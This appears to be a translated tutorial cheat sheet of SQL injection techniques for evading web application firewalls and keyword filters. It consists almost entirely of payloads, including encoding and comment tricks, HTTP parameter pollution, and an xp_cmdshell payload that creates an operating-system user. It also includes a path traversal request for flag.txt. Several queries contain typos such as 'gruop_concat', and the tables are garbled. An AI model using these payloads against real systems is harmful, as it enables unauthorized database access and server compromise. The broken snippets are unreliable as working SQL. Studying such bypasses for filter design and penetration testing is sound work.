Knowledge about SQL Injection bypass and SQL Injection Bypass

Knowledge about SQL Injection bypass and SQL Injection Bypass

I. Concept of bypassing waf

Start from step 1, analyze at, and then bypass.

1. Filter and, or

preg_match('/(and|or)/i', $id)Filtered injection: 1 or 1 = 1 1 and 1 = 1Bypassed injection: 1 || 1 = 1 1 && 1 = 1

2. Filter and, or, union

preg_match('/(and|or|union)/i', $id)Filtered injection: union select user, password from usersBypassed injection: 1 || (select user from users where user_id = 1) = 'admin'

3. Filter and, or, union, where

preg_match('/(and|or|union|where)/i', $id)Filtered injection: 1 || (select user from users where user_id = 1) = 'admin'Bypassed injection: 1 || (select user from users limit 1) = 'admin'

4. Filter and, or, union, where, limit

preg_match('/(and|or|union|where|limit)/i', $id)Filtered injection: 1 || (select user from users limit 1) = 'admin'Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'

5. Filter and, or, union, where, limit, group

preg_match('/(and|or|union|where|limit|group by)/i', $id)Filtered injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'Bypassed injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users ) = 1

6. Filter and, or, union, where, limit, group by, select

preg_match('/(and|or|union|where|limit|group by|select)/i', $id)Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1Bypassed injection: 1 || 1 = 1 into outfile 'result.txt'Bypassed injection: 1 || substr(user,1,1) = 'a'

7. Filter and, or, union, where, limit, group by, select ,'

preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1Bypassed injection: 1 || user_id is not nullBypassed injection: 1 || substr(user,1,1) = 0x61Bypassed injection: 1 || substr(user,1,1) = unhex(61)

8. Filter and, or, union, where, limit, group by, select, ', hex

preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)Filtered injection: 1 || substr(user,1,1) = unhex(61)Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))

9. Filter and, or, union, where, limit, group by, select, ', hex, substr

preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36))Bypassed injection: 1 || lpad(user,7,1)

10. Filter and, or, union, where, limit, group by, select, ', hex, substr, and space.

preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)Filtered injection: 1 || lpad(user,7,1)ypassed injection: 1%0b||%0blpad(user,7,1)

Ii. Regular Expression Bypass

This function is bypassed Based on the Fuzzy Matching feature of the regular expression, for example, filtering '='

filtered injection: 1 or 1 = 1

Bypassed injection: 1 or 1,1 or ‘1',1 or char(97)

eg:filtered injection:  1 union select 1, table_name from information_schema.tables where table_name = 'users'Bypassed injection:  1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'Bypassed injection:  1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)Bypassed injection:  1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7aBypassed Injection:  1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273

Iii. General Bypass

1. annotator

?id=1+un//ion+se//lect+1,2,3–

2. Case sensitivity

?id=1+UnIoN//SeLecT//1,2,3–

3. Keyword replacement

Some waf and so on use preg_replace to replace the SQL keyword

?id=1+UNunionION+SEselectLECT+1,2,3--?id=1+uni%0bon+se%0blect+1,2,3--

Sometimes the annotator '/**/' may be filtered or % 0b can be used to bypass

Forbidden: http://localhost/id/1/**/||/**/lpad(first_name,7,1).htmlBypassed : http://localhost/id/1%0b||%0blpad(first_name,7,1).html

4. Encoding

A typical Script: Nukesentinel. php

// Check for UNION attack  // Copyright 2004(c) Raven PHP scripts  $blocker_row = $blocker_array[1];  if($blocker_row['activate'] > 0) {  if (stristr($nsnst_const['query_string'],'+union+') OR \  stristr($nsnst_const['query_string'],'%20union%20') OR \  stristr($nsnst_const['query_string'],'*/union/*') OR \  stristr($nsnst_const['query_string'],' union ') OR \  stristr($nsnst_const['query_string_base64'],'+union+') OR \  stristr($nsnst_const['query_string_base64'],'%20union%20') OR \  stristr($nsnst_const['query_string_base64'],'*/union/*') OR \  stristr($nsnst_const['query_string_base64'],' union ')) { // block_ip($blocker_row);   die("BLOCK IP 1 " );  }  }

Forbidden: http://localhost/php/?/**/union/**/selectBypassed : http://localhost/php/?/%2A%2A/union/%2A%2A/selectBypassed : http://localhost/php/?%2f**%2funion%2f**%2fselect

5. Buffer Overflow

http://localhost/news.php?id=1+and+(select 1)=(select 0xA*1000)+union+select+1,2,version(),database(),user(),6,7,8,9,10–

6. inline annotation (mysql)

http://localhost/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--http://localhost/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--

Iv. Advanced Bypass

1. HPP (http parameter contamination)

For example:

index.php?par1=val1&par1=val2| web server | par1 || :— | :— || ASP.NET/IIS | val1,val2 || ASP/IIS | val1,val2 || PHP/Apache | val2 || JSP/Tomcat | val1 |

Eg:

In an ASP/ASP. NET Environment

Forbidden: http://localhost/search.aspx?q=select name,password from usersBypassed : http://localhost/search.aspx?q=select name&q=password from usersBypassed : http://localhost/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/usersBypassed : http://localhost/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ net user test test /*&id=1*/ --

2. HPC (http parameter contamination)

RFC2396 defines the following characters:

Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ()Reserved : ; / ? : @ & = + $ ,Unwise : { } | \ ^ [ ] `

Different Web servers use different logic to process specially crafted requests:

| Query String | Apache/2.2.16,PHP/5.3.3 | IIS6/ASP || :— | :— | :— || ?test[1=2 | test_1=2 | test[1=2 || ?test=% | test=% | test= || ?test%00=1 | test= | test=1 || ?test=1%001 | NULL | test=1 || ?test+d=1+2 | test_d=1 2 | test d=1 2 |

Eg:

Forbidden: http://localhost/?xp_cmdshellBypassed : http://localhost/?xp[cmdshellForbidden: http://localhost/test.asp?file=../flag.txtBypassed : http://localhost/test.asp?file=.%./flag.txtForbidden: http://localhost/news.asp?id=10 and 1=0/(select top 1 table_name from information_schema.tables)Bypassed : http://localhost/news.asp?id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)

Summary

The above is a summary of the SQL Injection bypass skills. I hope the content in this article will help you in your study or work. If you have any questions, you can leave a message, thank you for your support.